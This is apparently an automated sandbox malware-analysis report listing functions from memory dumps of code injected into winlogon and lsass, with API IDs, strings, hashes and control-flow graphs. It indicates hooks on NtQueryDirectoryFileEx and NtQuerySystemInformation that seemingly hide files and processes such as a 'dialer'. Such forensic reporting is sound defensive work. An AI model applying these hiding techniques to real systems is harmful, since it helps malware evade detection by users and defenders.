                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: _log10_special
                                                                  • String ID: dll
                                                                  • API String ID: 3812965864-1037284150
                                                                  • Opcode ID: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                                  • Instruction ID: a033ca639208bb76df8529d98fb46130cd952fbec87511a36938c0d524ea7bf4
                                                                  • Opcode Fuzzy Hash: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                                  • Instruction Fuzzy Hash: 95617329935F68ACD5639BBD9869325E71CFFA63C6F41D317E90B76A61DB389003C200
                                                                  Function 00000225DC682B20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastWrite
                                                                  • String ID: U
                                                                  • API String ID: 442123175-4171548499
                                                                  • Opcode ID: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction ID: 0274afc85186ba73af22fb5fc867c40b456c31728ce448c832b0fb41c8519a75
                                                                  • Opcode Fuzzy Hash: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction Fuzzy Hash: C441E776315E9092DB61CFA9E4483AA77A0FB98B95F908021EE4D877D4EF7CC441C741
                                                                  Function 00000225DC652B20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorFileLastWrite
                                                                  • String ID: U
                                                                  • API String ID: 442123175-4171548499
                                                                  • Opcode ID: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction ID: d57db7584a138c52917ddc7b342454cb98f343c5499785089f4aebbd3a489f1c
                                                                  • Opcode Fuzzy Hash: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                                  • Instruction Fuzzy Hash: 96410776724E5092DB61CFA9E4483AE77A0F398785F508021EE4E87794DF3CC441CB40
                                                                  Function 00000225DC6798D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFileHeaderRaise
                                                                  • String ID: csm
                                                                  • API String ID: 2573137834-1018135373
                                                                  • Opcode ID: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                                  • Instruction ID: deee5491ab775c55da42ba5d39800ab26e82f5b6114056a9b353bb04cc1457c8
                                                                  • Opcode Fuzzy Hash: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                                  • Instruction Fuzzy Hash: 7C112B36214F9492EB218F69E44435977E5FB88B95F588624EF8C07B98DF3CC552CB00
                                                                  Function 00000225DC6498D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: ExceptionFileHeaderRaise
                                                                  • String ID: csm
                                                                  • API String ID: 2573137834-1018135373
                                                                  • Opcode ID: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                                  • Instruction ID: 0d275ce854d030e756eb79a42c121c6670bcaaf5448bbb4a099848c04caaf7ae
                                                                  • Opcode Fuzzy Hash: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                                  • Instruction Fuzzy Hash: 44114936219F9092EB618F69E40425977E4F788B85F588264EF8D07B58DF38C552CB00
                                                                  Function 00000225DC617786 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: __std_exception_copy
                                                                  • String ID: `vector constructor iterator'$ctor closure'
                                                                  • API String ID: 592178966-3792692944
                                                                  • Opcode ID: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                                  • Instruction ID: 369ed350c5b8a5fa9f90472ddc939bdc9db8d7ed1e26dee6b27b1024de40b66b
                                                                  • Opcode Fuzzy Hash: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                                  • Instruction Fuzzy Hash: 12E0CD61A41F44E0DF118F65E4842D873A0DB58B69F48D1229D5C07311FB38D1E9C300
                                                                  Function 00000225DC6177E4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: __std_exception_copy
                                                                  • String ID: ctor closure'$destructor iterator'
                                                                  • API String ID: 592178966-595914035
                                                                  • Opcode ID: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                                  • Instruction ID: 0c8c670500c278d5134ffcd7486f256337451b4d70f9b3fa90c17dbf0d8393ca
                                                                  • Opcode Fuzzy Hash: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                                  • Instruction Fuzzy Hash: C8E0CD61A01F44E0DF118F65D4801D87360E758B59F88D122CD5C07311FB38D1E5C300
                                                                  Function 00000225DC6178EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000003.1768686905.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_3_225dc610000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: std::bad_alloc::bad_alloc
                                                                  • String ID: `scalar deleting destructor'$rFeaturePresent
                                                                  • API String ID: 1875163511-1689945142
                                                                  • Opcode ID: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                                  • Instruction ID: 8bb4a739cd02cdd81426781c51b70855e61a2b863bd89cb87c9d0e7e9bc9f89f
                                                                  • Opcode Fuzzy Hash: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                                  • Instruction Fuzzy Hash: 9CD09E26612E94B5EE10EB58D889389A335F39435BF908521D14D419B5DF38CA4AD740
                                                                  Function 00000225DC671C34 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 756756679-0
                                                                  • Opcode ID: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                                  • Instruction ID: cb710e214392adb98e7e1bc15610568e10cb2f2f52e749ec9d6a97ed601f99dd
                                                                  • Opcode Fuzzy Hash: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                                  • Instruction Fuzzy Hash: CC118429A11F50D1EB15CBEEA40C21967A1FB89FD2F998129DF8D677A6DF38D442C300
                                                                  Function 00000225DC641C34 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocFree
                                                                  • String ID:
                                                                  • API String ID: 756756679-0
                                                                  • Opcode ID: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                                  • Instruction ID: 8dafebc6d1d3c9367e8271f53e9954d881f86142d414424bbccf8574e8ef8368
                                                                  • Opcode Fuzzy Hash: 138e9805673e9783fb607e1b8e779fad2fd7a8f9a8e5a925b2c8afb7781e516c
                                                                  • Instruction Fuzzy Hash: BD118429A15F5091EB54CBEEA80C11977A1F789FD2F598124DF4E63725DF38D442C300
                                                                  Function 00000225DC671268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                                  • Instruction ID: 3f66ec7eff3bcd0e15884a61143856ea2199e44c5a4c1291958b41b9943c3ea9
                                                                  • Opcode Fuzzy Hash: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                                  • Instruction Fuzzy Hash: 45E03935601E1086E704CBEAD80C349B7E1EB88F06F84C0248A890B392DF7DC499C741
                                                                  Function 00000225DC641268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                                  • Instruction ID: 6fcaa93aea724b91e8d158e9725c5533d957a52198547a3e80ddf154f2a01fa4
                                                                  • Opcode Fuzzy Hash: 82c219c6629c72d91ab1c60b28cb1fe49c35d6a1ad48fabfff97e5801092fb08
                                                                  • Instruction Fuzzy Hash: 2BE06D35621E1086E7548FEAD80C369B7E1FB98F06F14C024CA0907351DF7DC499CB40
                                                                  Function 00000225DC671000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939662789.00000225DC671000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939578820.00000225DC670000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939785466.00000225DC686000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939886169.00000225DC691000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939983966.00000225DC693000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2940086783.00000225DC699000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc670000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                  • Instruction ID: e2260efe5ca84f6892b78aa0f9e2a292f15a717dc4a8545187d79ec1f9b840bc
                                                                  • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                  • Instruction Fuzzy Hash: BEE0ED75611D5096E708DBEAD80C259B7A1FF88F16F84C024CA5907352DE388499C711
                                                                  Function 00000225DC641000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                  • Instruction ID: b8c2929ccd3e035d4def54f83262ce4d1b8ced75698f8e2f7280696942ad402a
                                                                  • Opcode Fuzzy Hash: 5675c379a8d9e89708cd85a835e518bb04a23da85e3639b53f95be9f51753b7f
                                                                  • Instruction Fuzzy Hash: D6E0E575621E6096E7689BEAD80C269B7A1FB98B16F58C024CA0907321EE388499CA10

                                                                  Executed Functions

                                                                  Function 00000202C0AE2604 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 185filenativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 11 202c0ae2604-202c0ae2688 NtQueryDirectoryFileEx 12 202c0ae28a0-202c0ae28c3 11->12 13 202c0ae268e-202c0ae2691 11->13 13->12 14 202c0ae2697-202c0ae26a5 13->14 14->12 15 202c0ae26ab-202c0ae26f1 call 202c0ae9090 * 3 GetFileType 14->15 22 202c0ae2709-202c0ae2713 call 202c0ae19d8 15->22 23 202c0ae26f3-202c0ae2707 StrCpyW 15->23 25 202c0ae2718-202c0ae271c 22->25 23->25 26 202c0ae27c7-202c0ae27cc 25->26 27 202c0ae2722-202c0ae273b call 202c0ae3370 call 202c0ae3c74 25->27 28 202c0ae27cf-202c0ae27d4 26->28 40 202c0ae273d-202c0ae276c call 202c0ae3370 call 202c0ae330c call 202c0ae1cd8 27->40 41 202c0ae2772-202c0ae27bc 27->41 30 202c0ae27f1 28->30 31 202c0ae27d6-202c0ae27d9 28->31 35 202c0ae27f4-202c0ae280d call 202c0ae3370 call 202c0ae3c74 30->35 31->30 33 202c0ae27db-202c0ae27de 31->33 33->30 36 202c0ae27e0-202c0ae27e3 33->36 51 202c0ae284f-202c0ae2851 35->51 52 202c0ae280f-202c0ae283e call 202c0ae3370 call 202c0ae330c call 202c0ae1cd8 35->52 36->30 39 202c0ae27e5-202c0ae27e8 36->39 39->30 43 202c0ae27ea-202c0ae27ef 39->43 40->12 40->41 41->12 49 202c0ae27c2 41->49 43->30 43->35 49->27 54 202c0ae2872-202c0ae2875 51->54 55 202c0ae2853-202c0ae286d 51->55 52->51 72 202c0ae2840-202c0ae284b 52->72 58 202c0ae287f-202c0ae2882 54->58 59 202c0ae2877-202c0ae287d 54->59 55->28 62 202c0ae289d 58->62 63 202c0ae2884-202c0ae2887 58->63 59->12 62->12 63->62 66 202c0ae2889-202c0ae288c 63->66 66->62 68 202c0ae288e-202c0ae2891 66->68 68->62 69 202c0ae2893-202c0ae2896 68->69 69->62 71 202c0ae2898-202c0ae289b 69->71 71->12 71->62 72->12 73 202c0ae284d 72->73 73->28
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: File$DirectoryQueryType
                                                                  • String ID: \\.\pipe\
                                                                  • API String ID: 4175507832-91387939
                                                                  • Opcode ID: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction ID: 7c144d842cfa7ee9069d61077705dc80e63a598e4779714d2bf260ea5e717718
                                                                  • Opcode Fuzzy Hash: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                                  • Instruction Fuzzy Hash: DD719132204BC1C6FB65DF26989C3AE6794F785B84F560017DFA947B9ADE34CA18C740
                                                                  Function 00000202C0AE211C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162nativeCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 74 202c0ae211c-202c0ae2156 NtQuerySystemInformation 75 202c0ae215f-202c0ae2162 74->75 76 202c0ae2158-202c0ae215c 74->76 77 202c0ae2168-202c0ae216b 75->77 78 202c0ae2313-202c0ae2333 75->78 76->75 79 202c0ae2171-202c0ae2183 77->79 80 202c0ae2263-202c0ae2266 77->80 79->78 83 202c0ae2189-202c0ae2195 79->83 81 202c0ae2268-202c0ae2282 call 202c0ae31cc 80->81 82 202c0ae22d7-202c0ae22da 80->82 81->78 95 202c0ae2288-202c0ae229e 81->95 82->78 84 202c0ae22dc-202c0ae22ef call 202c0ae31cc 82->84 86 202c0ae2197-202c0ae21a7 83->86 87 202c0ae21c3-202c0ae21ce call 202c0ae1bc8 83->87 84->78 96 202c0ae22f1-202c0ae22f9 84->96 86->87 88 202c0ae21a9-202c0ae21c1 StrCmpNIW 86->88 92 202c0ae21ef-202c0ae2201 87->92 97 202c0ae21d0-202c0ae21e8 call 202c0ae1c34 87->97 88->87 88->92 98 202c0ae2211-202c0ae2213 92->98 99 202c0ae2203-202c0ae2205 92->99 95->78 100 202c0ae22a0-202c0ae22bc 95->100 96->78 101 202c0ae22fb-202c0ae2303 96->101 97->92 114 202c0ae21ea-202c0ae21ed 97->114 105 202c0ae221a 98->105 106 202c0ae2215-202c0ae2218 98->106 103 202c0ae220c-202c0ae220f 99->103 104 202c0ae2207-202c0ae220a 99->104 107 202c0ae22c0-202c0ae22d3 100->107 108 202c0ae2306-202c0ae2311 101->108 110 202c0ae221d-202c0ae2220 103->110 104->110 105->110 106->110 107->107 111 202c0ae22d5 107->111 108->78 108->108 112 202c0ae222e-202c0ae2231 110->112 113 202c0ae2222-202c0ae2228 110->113 111->78 112->78 115 202c0ae2237-202c0ae223b 112->115 113->83 113->112 114->110 116 202c0ae223d-202c0ae2240 115->116 117 202c0ae2252-202c0ae225e 115->117 116->78 118 202c0ae2246-202c0ae224b 116->118 117->78 118->115 119 202c0ae224d 118->119 119->78
                                                                  APIs
                                                                  • NtQuerySystemInformation.NTDLL ref: 00000202C0AE2147
                                                                  • StrCmpNIW.SHLWAPI ref: 00000202C0AE21B6
                                                                    • Part of subcall function 00000202C0AE31CC: GetProcessHeap.KERNEL32(?,?,?,?,?,00000202C0AE22ED), ref: 00000202C0AE31EF
                                                                    • Part of subcall function 00000202C0AE31CC: HeapAlloc.KERNEL32(?,?,?,?,?,00000202C0AE22ED), ref: 00000202C0AE3202
                                                                    • Part of subcall function 00000202C0AE31CC: StrCmpNIW.SHLWAPI(?,?,?,?,?,00000202C0AE22ED), ref: 00000202C0AE3277
                                                                    • Part of subcall function 00000202C0AE31CC: GetProcessHeap.KERNEL32(?,?,?,?,?,00000202C0AE22ED), ref: 00000202C0AE32DD
                                                                    • Part of subcall function 00000202C0AE31CC: HeapFree.KERNEL32(?,?,?,?,?,00000202C0AE22ED), ref: 00000202C0AE32EB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_70_2_202c0ae0000_lsass.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocFreeInformationQuerySystem
                                                                  • String ID: S$dialer
                                                                  • API String ID: 722747020-3873981283
                                                                  • Opcode ID: 6a3425f5eaa1fa7964d7839e93a7c40b0f2b076159b3436a422c3db3c6fc66b9
                                                                  • Instruction ID: 2af22fa2d5a476c3eb6816d0402fe00be2f6e3f603dc11344672abf1fb5e6cd2
                                                                  • Opcode Fuzzy Hash: 6a3425f5eaa1fa7964d7839e93a7c40b0f2b076159b3436a422c3db3c6fc66b9
                                                                  • Instruction Fuzzy Hash: FC519D32B107A1C6FB60CB25D88CAAD73A5F704784F168527DFA557B8ADB38C869C740
                                                                  Function 00000202C0AE1934 Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000046.00000002.2942740683.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                                  • Associated: 00000046.00000002.2942686217.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942785956.00000202C0AF6000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942842412.00000202C0B01000.00000004.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942887947.00000202C0B03000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  • Associated: 00000046.00000002.2942943407.00000202C0B09000.00000002.00000001.00020000.00000000.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
